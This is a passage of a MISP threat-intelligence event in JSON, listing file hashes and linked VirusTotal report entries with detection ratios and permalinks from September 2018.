"VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334489", "uuid": "ebb05fd0-b56c-4384-bde9-b8e540af4c63", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334489", "to_ids": false, "type": "datetime", "uuid": "9707f2d5-8180-48c6-80e2-025cf0854494", "value": "2018-09-19T03:31:19" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334489", "to_ids": false, "type": "link", "uuid": 
"a826a3c1-863e-4783-a3d7-6681f99f56c4", "value": "https://www.virustotal.com/file/31155bf8c85c6c6193842b8d09bda88990d710db9f70efe85c421f1484f0ee78/analysis/1537327879/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334490", "to_ids": false, "type": "text", "uuid": "13fdd406-d4b9-4915-b544-d01eafb9c379", "value": "42/67" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334493", "uuid": "f092ea7b-05e2-4d29-8196-a214407feb5e", "ObjectReference": [ { "comment": "", "object_uuid": "f092ea7b-05e2-4d29-8196-a214407feb5e", "referenced_uuid": "0483921b-12e2-450d-97c6-543e513e4a6a", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-78cc-4440-a082-4a7d02de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334490", "to_ids": true, "type": "md5", "uuid": "00aac258-a390-4f11-bfb8-ea78eef73f68", "value": "1ef7d145bf7153292ea33fe7c900ece9" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334490", "to_ids": true, "type": "sha1", "uuid": "b2c5b04a-39cf-4e61-a5d9-00601f12a8fc", "value": "8f0323e577d4df82c7faa4cd6ba7303b38b6a26e" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334491", "to_ids": true, "type": "sha256", "uuid": "d901ba15-1665-4163-b728-4db92e941209", "value": "ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": 
"virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334491", "uuid": "0483921b-12e2-450d-97c6-543e513e4a6a", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334491", "to_ids": false, "type": "datetime", "uuid": "2a60357e-ee2f-464b-94fe-aaecf41cc0dd", "value": "2018-09-19T03:31:28" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334491", "to_ids": false, "type": "link", "uuid": "7a27e755-1f59-493b-9614-e9179f2be1e6", "value": "https://www.virustotal.com/file/ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50/analysis/1537327888/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334492", "to_ids": false, "type": "text", "uuid": "eb43528e-3ebb-45ba-a024-ab76913aa644", "value": "38/66" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334495", "uuid": "9b4f7e14-e26f-4b8e-95a6-a5494c397ad0", "ObjectReference": [ { "comment": "", "object_uuid": "9b4f7e14-e26f-4b8e-95a6-a5494c397ad0", "referenced_uuid": "871efca7-2ad6-4bfe-a116-dcd8cf14fb6a", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-dabc-477b-afd0-4f8f02de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334492", "to_ids": true, "type": "md5", "uuid": "12f97b8f-abbd-4b32-9a94-63ff17e444c0", "value": "a6484c6e007b1277164dd49115e5e271" }, { "category": "Payload delivery", "comment": 
"", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334492", "to_ids": true, "type": "sha1", "uuid": "2cbf9628-b3b0-49cd-927e-e210c918d760", "value": "0308aaea4d969bc7fe4391e86b14c4908ab6adbe" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334493", "to_ids": true, "type": "sha256", "uuid": "097d6023-b13c-4daf-abd7-df0e70c02a0d", "value": "09968c4573580398b3269577ced28090eae4a7c326c1a0ec546761c623625885" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334493", "uuid": "871efca7-2ad6-4bfe-a116-dcd8cf14fb6a", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334493", "to_ids": false, "type": "datetime", "uuid": "2b1a7a8f-99fc-4684-98e7-f38d718555a8", "value": "2018-09-18T12:02:50" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334494", "to_ids": false, "type": "link", "uuid": "7d67a45d-37b8-4972-93be-68eb79124851", "value": "https://www.virustotal.com/file/09968c4573580398b3269577ced28090eae4a7c326c1a0ec546761c623625885/analysis/1537272170/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334494", "to_ids": false, "type": "text", "uuid": "f916ec81-9212-4dc6-bef9-dc7982bd15a3", "value": "20/58" } ] } ] } }